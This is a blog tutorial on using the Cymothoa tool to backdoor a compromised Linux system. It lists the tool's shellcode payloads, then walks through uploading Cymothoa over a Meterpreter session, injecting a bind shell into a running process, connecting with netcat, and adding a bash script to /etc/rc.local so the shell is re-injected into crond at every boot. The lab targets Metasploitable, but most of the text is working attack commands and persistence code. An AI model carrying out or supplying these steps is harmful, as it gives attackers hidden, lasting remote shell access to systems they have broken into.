Cymothoa is a post-exploitation tool. It can be used to maintain access to an exploited system. Cymothoa injects a variety of shellcodes to running processes in a system. Almost all nix systems most of the Linux variants can be backdoored with cymothoa.
Cymothoa uses ptrace library in nix systems to evaluate running processes & inject shellcodes. The greatest advantage of this tool is that we need not create a separate process for the backdoor. While a process is running itself, we can infect a process and start a backdoor. Say for example, if we exploited a web server, hell sure apache2 or httpd or nginx or whatever the web server program is, will be turned on during boot. So we try to inject cymothoa to such service daemons & automate its start during boot. Let’s see it in action, but first, learn a bit about cymothoa
Homepage: http://cymothoa.sourceforge.net/
Options
Syntax: cymothoa -p <pid> -s <shellcode_number> [options]
Main options: -p process pid -s shellcode number -l memory region name for shellcode injection (default /lib/ld) search for "r-xp" permissions, see /proc/pid/maps... -m memory region name for persistent memory (default /lib/ld) search for "rw-p" permissions, see /proc/pid/maps... -h print this help screen -S list available shellcodes Injection options (overwrite payload flags): -f fork parent process -F don't fork parent process -b create payload thread (probably you need also -F) -B don't create payload thread -w pass persistent memory address -W don't pass persistent memory address -a use alarm scheduler -A don't use alarm scheduler -t use setitimer scheduler -T don't use setitimer scheduler Payload arguments: -j set timer (seconds) -k set timer (microseconds) -x set the IP -y set the port number -r set the port number 2 -z set the username (4 bytes) -o set the password (8 bytes) -c set the script code (ex: "#!/bin/sh\nls; exit 0") escape codes will not be interpreted... Payloads 0 - bind /bin/sh to the provided port (requires -y) 1 - bind /bin/sh + fork() to the provided port (requires -y) - izik <izik@tty64.org> 2 - bind /bin/sh to tcp port with password authentication (requires -y -o) 3 - /bin/sh connect back (requires -x, -y) 4 - tcp socket proxy (requires -x -y -r) - Russell Sanford (xort@tty64.org) 5 - script execution (see the payload), creates a tmp file you must remove 6 - forks an HTTP Server on port tcp/8800 - http://xenomuta.tuxfamily.org/ 7 - serial port busybox binding - phar@stonedcoder.org mdavis@ioactive.com 8 - forkbomb (just for fun...) - Kris Katterjohn 9 - open cd-rom loop (follows /dev/cdrom symlink) - izik@tty64.org 10 - audio (knock knock knock) via /dev/dsp - Cody Tubbs (pigspigs@yahoo.com) 11 - POC alarm() scheduled shellcode 12 - POC setitimer() scheduled shellcode 13 - alarm() backdoor (requires -j -y) bind port, fork on accept 14 - setitimer() tail follow (requires -k -x -y) send data via upd
Lab: Inject Backdoor into a Compromised Linux System
Scenario: We have an attacker system running Kali linux with IP 192.168.0.103, a target Linux system(metasploitable 2.0) with IP 192.168.0.102. The story continues after the victim is exploited. I have already got a meterpreter shell connected to the victim.
I will explain in brief the procedure for this. Take a look at the following figure.
Yes, that is the algorithm. I want you to understand the procedure rather than just copying the steps. We first exploit the system gain access to it. Then the rest is all about Maintaining access.
Then we can try uploading the existing cymothoa binary(/usr/bin/cymothoa or /usr/share/cymothoa) to the target & try executing it. But it failed for me all the time. So if it does, proceed to step 3 below. If it doesn’t, don’t worry, we have access to the system, we will download a new copy & install it.
After installation, try executing it. If the cymothoa banner comes, then the installation is successful. After this, we try infecting a running process & see if we can get a connection. Mostly this will succeed. If it doesn’t just try it with another process. But the problem with this is it only lasts for the present & not for the future.
Meaning, if the process dies or the system is rebooted, we won’t get the backdoor running. For this, we create a shell script and edit some boot time configurations in the victim & make a process infected each time the system starts or reboots. Thus we can have a persistent backdoor.
Enough Talk, Lets Attack!
Step 1: Download Cymothoa & Upload it to Victim
Download the latest version from the link below using the web browser in Kali Linux attacker machine.
Download Link: http://sourceforge.net/projects/cymothoa/files/cymothoa-1-alpha/
The default location is /root/Downloads. Remember this.
Now I have a meterpreter session running(How to gain access in Exploitation section.). Upload the downloaded archive to the victim. Optionally you can also download it directly to the victim (if you know).
meterpreter > upload Downloads/cymothoa<press tab> <space> /root/ meterpreter > shell command: tar -xvf cymothoa< Enter full name here, Pressing tab key Doesen't work>
Note: Every time you drop into a shell from meterpreter, the shell has limited capabilities. Tab key doesn’t work & vim doesn’t return a display. It crashes if we open something in vim or nano.
Step 2: Install Cymothoa & Execute.
While we are in the shell. Change directory to the location we uploaded the archive and give execute permissions. Then execute the “Makefile”.
command cd <location> command: chmod +x cymothoa<full name> -R command: ./Makefile
Now try to execute the file. Remember to be in the directory where you uploaded the archive.
Command: ./cymothoa
Step 3: Infect a running process.
Now find the processes running in the system & note the process id (pid).
command: ps -e
Now, infect the process with cymothoa.
syntax: ./cymothoa -p <pid> -s <shellcode number> -y <listening port>
command: ./cymothoa -p 5476 -s 1 -y 100
Tip: Remember to check whether the listening port(-y option) is already in use.
Now check if the port is open
command: netstat -l | grep 100<your port here>
Step 4: Try a netcat connection from the attacker machine.
Open up a new terminal in Kali Linux attacker system & initiate a netcat connection to the port we specified
command: nc 192.168.0.102 100 <give your victim ip & port>
There you have…!
Step 5: Prepare script, upload it & set up execution.
This is the hard part. If you have any idea about shell scripting you can understand. Or else try to learn some. Anyway, the script is very simple. It first extracts the pid of a service or a daemon. Checks if it is a number or not.
Sometimes a process will have child processes. So there will be more than one pids available. In that case it is essential to extract one pid alone from a list of pids. Then the script assigns the pid to a variable (say q here). Then executes cymothoa with value of the variable q as the value for the “-p” option. Here is the script.
#!/bin/bash p=`cat /var/run/crond.pid` #extracts the pid. Here replace the last with a process of your desire. #example: p=`cat /var/run/apache2.pid`. #Remember the chracter before cat & after pid is a backtick & not an inverted comma. if [ "$p" -eq "$p" ] 2>/dev/null; then #checks whether it's a number or not. q=$p else q=`(echo $p | awk '{print $2}')` #takes the next row which will be a number. Here also it's a backtick fi echo $q exec /cymothoa-1-alpha/cymothoa -p $q -s 1 -y 100 # make sure to give absolute path of cymothoa in the victim. exit
Things to note:
- When assigning the output of a command to a variable, a backtick is used.
- Always give absolute & full paths whenever needed.
- You can choose any service. A service which is likely to start at boot like apache2/crond/vsftpd/mysqld etc is appropriate.
- Pid location is standard unix systems is ” /var/run/process.pid “.
- Make sure the listening port(-y option) will be unused by other services. Giving port 80 will be a bad idea if it’s a web server.
Copy the script to a file in the kali linux machine. Edit it accordingly and save it.
Drop back to meterpreter shell by pressing Cntrl+c & upload the script to /etc/init.d
meterpreter> upload cym.sh /etc/init.d/ <replace cym.sh by your filename>
Drop to the shell again by giving shell command & change permissions.
meterpreter> shell chmod +x /etc/init.d/cym.sh <replace by your file>
Now is the big part. We have to enable the script to run during boot time. this is simple, just add an entry to /etc/rc.local. But vim or nano will not be available.
Also if we cat the file(rc.local) there is a statement “exit 0” at the end. Any statements appended after this will not be executed. So we have to cut the last line, append our new line & then append the old exit line.
command: sed -i '$d' /etc/rc.local command: echo "sh /etc/init.d/cym.sh" >> /etc/rc.local command: echo "exit 0" >> /etc/rc.local
Ensure it by
command: tail /etc/rc.local
Note: Here also give absolute paths when writing it to the rc.local file.
All SET..!
Now while in the shell, issue
command: /etc/init.d/rc.local start
If every step were right, you got it. Then try netstat while within the shell & see if the port is listening. If you are permitted, reboot the machine so that the shell & meterpreter session dies. Open a netcat to the victim after some time. You will be amazed.
Phew ! That was long but you will get very good results. I had to do a lot of research for each steps in the process & would definitely like your feedback. Try this out & please subscribe, comment & follow this blog everywhere.
References:
http://www.cyberciti.biz/faq/unix-linux-bsd-appleosx-bash-assign-variable-command-output/
http://beginlinux.com/server/ubuntu/how-to-run-scripts-at-ubuntu-startup
http://scx020c07c.blogspot.in/2012/09/backdooring-using-cymothoa.html
http://stackoverflow.com/questions/806906/how-do-i-test-if-a-variable-is-a-number-in-bash